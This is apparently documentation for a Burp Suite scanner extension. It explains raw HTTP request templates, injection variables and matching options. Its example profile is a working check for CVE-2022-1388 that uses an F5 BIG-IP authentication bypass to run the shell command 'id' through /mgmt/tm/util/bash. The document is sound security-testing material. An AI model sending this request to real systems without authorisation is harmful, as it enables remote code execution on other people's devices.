📡Raw Request

Raw Request mode allows you to define a complete HTTP request template with payload injection points. Instead of relying on Burp Suite's insertion point detection, you craft the exact request to send, using variables for dynamic values.

⚙️ Enabling Raw Request Mode

Set requestType to 2 to enable Raw Request mode:

{
  "requestType": 2,
  "rawRequest": "POST /api/login HTTP/1.1\r\nHost: {CURRENT_HOST}\r\nContent-Type: application/json\r\n\r\n{\"username\":\"{PAYLOAD}\",\"password\":\"test\"}"
}

🔧 Raw Request Variables

The following variables are available in raw request templates:

💉 Payload Variables

Variable

Description

{PAYLOAD}

🎯 The current payload value (replaced for each payload in the list)

{PAYLOAD_URL}

🔗 The current payload, URL-encoded

📡 Request Context Variables

Variable

Description

{URL}

🔗 The full target URL

{COOKIE}

🍪 The cookies from the original request

{CURRENT_HOST}

🖥️ The target hostname

{CURRENT_PROTOCOL}

🔒 http or https

{CURRENT_PORT}

🔢 The target port

{CURRENT_PATH}

📂 The URL path

{CURRENT_QUERY}

❓ The query string

{CURRENT_METHOD}

📡 The HTTP method

{CURRENT_USER_AGENT}

🖥️ The User-Agent from the original request

{CURRENT_REFERER}

🔗 The Referer from the original request

{CURRENT_ORIGIN}

🌐 The Origin from the original request

{CURRENT_CONTENT_TYPE}

📄 The Content-Type from the original request

🌐 Global Variables

All global variables ({REDIRECT_DOMAIN}, {BC}, {ATTACKER_DOMAIN}, etc.) are also available.

🎯 Use Cases

📡 Custom HTTP Methods

Test non-standard HTTP methods:

PROPFIND / HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: application/xml

<?xml version="1.0"?>
<propfind xmlns="DAV:">
  <allprop/>
</propfind>

🔗 Specific Request Structure

Test a specific API endpoint with a custom body:

POST /api/v1/execute HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: application/json
Authorization: Bearer {COOKIE}

{"command":"{PAYLOAD}","timeout":30}

📄 XML/SOAP Requests

Test XML-based services:

POST /service HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: text/xml
SOAPAction: "urn:execute"

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <execute>
      <input>{PAYLOAD}</input>
    </execute>
  </soap:Body>
</soap:Envelope>

🔗 GraphQL Queries

Test GraphQL endpoints:

POST /graphql HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: application/json

{"query":"{ user(id: \"{PAYLOAD}\") { name email } }"}

📁 Multipart Requests

Test file upload endpoints:

POST /upload HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="file"; filename="{PAYLOAD}"
Content-Type: application/octet-stream

file_content_here
------Boundary--

🔍 Matching in Raw Request Mode

The same match types and grep options apply to Raw Request mode. The response from the raw request is analyzed using the profile's configured grep patterns, match type, and response filters.

Raw request mode supports all match types:

📝 Simple String / Regex matching
⏱️ Timeout detection (raw-specific implementation)
🔢 HTTP Response Code matching
📏 Content Length comparison
📊 Variations / Invariations
🌐 Collaborator detection

📚 Example Profile

[
  {
    "ProfileName": "CVE-2022-1388_F5_Big_IP_RCE",
    "Enabled": true,
    "Scanner": 1,
    "requestType": 2,
    "rawRequest": "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: {CURRENT_HOST}\r\nAuthorization: Basic YWRtaW46\r\nContent-Type: application/json\r\nConnection: X-F5-Auth-Token\r\nX-F5-Auth-Token: 0\r\n\r\n{\"command\":\"run\",\"utilCmdArgs\":\"-c {PAYLOAD}\"}",
    "Payloads": [
      "true,id"
    ],
    "Grep": [
      "true,,Regex,,uid=[0-9]+\\(.*\\)"
    ],
    "MatchType": 2,
    "IssueName": "CVE-2022-1388 F5 Big-IP RCE",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "<br/>- PAYLOAD: <br/><payload>\n<br/><br/>\n- GREP: <br/><grep>"
  }
]

📊 Differences from Standard Mode

Aspect

Standard (requestType=1)

Raw (requestType=2)

🏗️ Request construction

Burp Suite builds the request

You define the complete request

📍 Insertion points

Auto-detected by Burp

You place {PAYLOAD} where needed

🔢 Multiple injection points

One per insertion point

Multiple {PAYLOAD} in one request

📡 HTTP method

From original request (or modified)

Defined in raw template

📋 Headers

From original request (can be modified)

Defined in raw template

🍪 Cookie handling

Automatic

Manual via {COOKIE} variable

💡 Tips

📝 Use \r\n for line endings in raw requests (HTTP standard)
🖥️ Always include Host header using {CURRENT_HOST} to ensure requests go to the right target
🍪 Use {COOKIE} to forward cookies from the original request
🔗 Use {PAYLOAD_URL} when the payload needs URL encoding within the raw request
🧪 Test manually first — Use Burp Repeater to verify your raw request works before creating a profile

PreviousRedirections NextMatch and Replace

Last updated 9 hours ago

hashtag⚙️ Enabling Raw Request Mode

hashtag🔧 Raw Request Variables

hashtag💉 Payload Variables

hashtag📡 Request Context Variables

hashtag🌐 Global Variables

hashtag🎯 Use Cases

hashtag📡 Custom HTTP Methods

hashtag🔗 Specific Request Structure

hashtag📄 XML/SOAP Requests

hashtag🔗 GraphQL Queries

hashtag📁 Multipart Requests

hashtag🔍 Matching in Raw Request Mode

hashtag📚 Example Profile

hashtag📊 Differences from Standard Mode

hashtag💡 Tips